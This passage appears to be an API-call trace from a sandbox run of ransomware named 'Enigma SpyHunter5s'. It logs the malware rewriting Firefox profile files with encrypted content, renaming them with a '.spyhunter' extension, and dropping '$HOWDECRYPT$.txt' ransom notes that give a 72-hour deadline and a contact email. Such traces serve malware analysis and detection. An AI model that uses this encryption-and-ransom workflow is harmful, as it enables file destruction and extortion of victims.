lpNumberOfBytesWritten=0x270ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0150.318] GetProcessHeap () returned 0x2c0000 [0150.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.318] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.319] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x270ed4c*, lpNumberOfBytesWritten=0x270ed0c*=0x4, lpOverlapped=0x0) returned 1 [0150.319] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed0c*=0x30, lpOverlapped=0x0) returned 1 [0150.319] CloseHandle (hObject=0xa0) returned 1 [0150.319] GetProcessHeap () returned 0x2c0000 [0150.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.319] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MV7f.wav.spyhunter") returned 68 [0150.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MV7f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mv7f.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MV7f.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mv7f.wav.spyhunter")) returned 1 [0150.321] GetProcessHeap () returned 0x2c0000 [0150.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.321] GetProcessHeap () returned 0x2c0000 [0150.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.321] GetProcessHeap () returned 0x2c0000 [0150.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c978 | out: hHeap=0x2c0000) returned 1 [0150.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.322] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.322] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec7f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eda8, lpOverlapped=0x0 | out: lpBuffer=0x270ec7f*, lpNumberOfBytesWritten=0x270eda8*=0x127, lpOverlapped=0x0) returned 1 [0150.323] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.323] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eda8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eda8*=0x2ac, lpOverlapped=0x0) returned 1 [0150.323] CloseHandle (hObject=0xa0) returned 1 [0150.323] GetProcessHeap () returned 0x2c0000 [0150.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5118 | out: hHeap=0x2c0000) returned 1 [0150.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.324] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.324] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x270ec7b*, lpNumberOfBytesWritten=0x270eda4*=0x127, lpOverlapped=0x0) returned 1 [0150.325] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.325] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eda4*=0x2ac, lpOverlapped=0x0) returned 1 [0150.325] CloseHandle (hObject=0xa0) returned 1 [0150.325] GetProcessHeap () returned 0x2c0000 [0150.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f637c8 | out: hHeap=0x2c0000) returned 1 [0150.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed40 | out: pbBuffer=0x270ed40) returned 1 [0150.325] GetProcessHeap () returned 0x2c0000 [0150.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed38*=0x30) returned 1 [0150.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.326] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0150.326] StrStrW (lpFirst="profiles.ini", lpSrch=".txt") returned 0x0 [0150.326] GetProcessHeap () returned 0x2c0000 [0150.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.326] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ecfc*=0x6f, lpOverlapped=0x0) returned 1 [0150.327] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.327] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x270ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ecfc*=0x6f, lpOverlapped=0x0) returned 1 [0150.327] GetProcessHeap () returned 0x2c0000 [0150.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.328] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.328] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecfc, lpOverlapped=0x0 | out: lpBuffer=0x270ed3c*, lpNumberOfBytesWritten=0x270ecfc*=0x4, lpOverlapped=0x0) returned 1 [0150.328] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecfc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ecfc*=0x30, lpOverlapped=0x0) returned 1 [0150.328] CloseHandle (hObject=0xa0) returned 1 [0150.328] GetProcessHeap () returned 0x2c0000 [0150.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.328] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.spyhunter") returned 88 [0150.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.spyhunter")) returned 1 [0150.390] GetProcessHeap () returned 0x2c0000 [0150.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.391] GetProcessHeap () returned 0x2c0000 [0150.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.391] GetProcessHeap () returned 0x2c0000 [0150.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ee78 | out: hHeap=0x2c0000) returned 1 [0150.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.404] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.404] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed9c, lpOverlapped=0x0 | out: lpBuffer=0x270ec73*, lpNumberOfBytesWritten=0x270ed9c*=0x127, lpOverlapped=0x0) returned 1 [0150.405] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.405] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed9c*=0x2ac, lpOverlapped=0x0) returned 1 [0150.405] CloseHandle (hObject=0xb0) returned 1 [0150.405] GetProcessHeap () returned 0x2c0000 [0150.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8c50 | out: hHeap=0x2c0000) returned 1 [0150.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed38 | out: pbBuffer=0x270ed38) returned 1 [0150.405] GetProcessHeap () returned 0x2c0000 [0150.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed30*=0x30) returned 1 [0150.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0150.406] StrStrW (lpFirst="sessionstore.js", lpSrch=".txt") returned 0x0 [0150.406] GetProcessHeap () returned 0x2c0000 [0150.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.406] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ecf4*=0xbc5, lpOverlapped=0x0) returned 1 [0150.550] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff43b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.551] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xbc5, lpNumberOfBytesWritten=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ecf4*=0xbc5, lpOverlapped=0x0) returned 1 [0150.551] GetProcessHeap () returned 0x2c0000 [0150.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.551] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.551] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x270ed34*, lpNumberOfBytesWritten=0x270ecf4*=0x4, lpOverlapped=0x0) returned 1 [0150.556] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecf4*=0x30, lpOverlapped=0x0) returned 1 [0150.556] CloseHandle (hObject=0xb0) returned 1 [0150.556] GetProcessHeap () returned 0x2c0000 [0150.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.556] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.spyhunter") returned 117 [0150.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.spyhunter")) returned 1 [0150.557] GetProcessHeap () returned 0x2c0000 [0150.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.557] GetProcessHeap () returned 0x2c0000 [0150.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.557] GetProcessHeap () returned 0x2c0000 [0150.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1080 | out: hHeap=0x2c0000) returned 1 [0150.557] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed38 | out: pbBuffer=0x270ed38) returned 1 [0150.558] GetProcessHeap () returned 0x2c0000 [0150.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.558] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed30*=0x30) returned 1 [0150.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0150.558] StrStrW (lpFirst="search.json", lpSrch=".txt") returned 0x0 [0150.558] GetProcessHeap () returned 0x2c0000 [0150.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.558] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ecf4*=0x2800, lpOverlapped=0x0) returned 1 [0150.577] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.578] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ecf4*=0x2800, lpOverlapped=0x0) returned 1 [0150.578] GetProcessHeap () returned 0x2c0000 [0150.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.578] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.578] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x270ed34*, lpNumberOfBytesWritten=0x270ecf4*=0x4, lpOverlapped=0x0) returned 1 [0150.578] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecf4*=0x30, lpOverlapped=0x0) returned 1 [0150.578] CloseHandle (hObject=0xb0) returned 1 [0150.578] GetProcessHeap () returned 0x2c0000 [0150.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.578] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.spyhunter") returned 113 [0150.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.spyhunter")) returned 1 [0150.579] GetProcessHeap () returned 0x2c0000 [0150.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.579] GetProcessHeap () returned 0x2c0000 [0150.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.579] GetProcessHeap () returned 0x2c0000 [0150.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67de0 | out: hHeap=0x2c0000) returned 1 [0150.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed30 | out: pbBuffer=0x270ed30) returned 1 [0150.580] GetProcessHeap () returned 0x2c0000 [0150.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.580] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed28*=0x30) returned 1 [0150.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0150.580] StrStrW (lpFirst="permissions.sqlite", lpSrch=".txt") returned 0x0 [0150.580] GetProcessHeap () returned 0x2c0000 [0150.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.580] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ecec*=0x2800, lpOverlapped=0x0) returned 1 [0150.641] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.642] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ecec*=0x2800, lpOverlapped=0x0) returned 1 [0150.642] GetProcessHeap () returned 0x2c0000 [0150.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.642] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.642] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecec, lpOverlapped=0x0 | out: lpBuffer=0x270ed2c*, lpNumberOfBytesWritten=0x270ecec*=0x4, lpOverlapped=0x0) returned 1 [0150.642] WriteFile (in: hFile=0xb0, 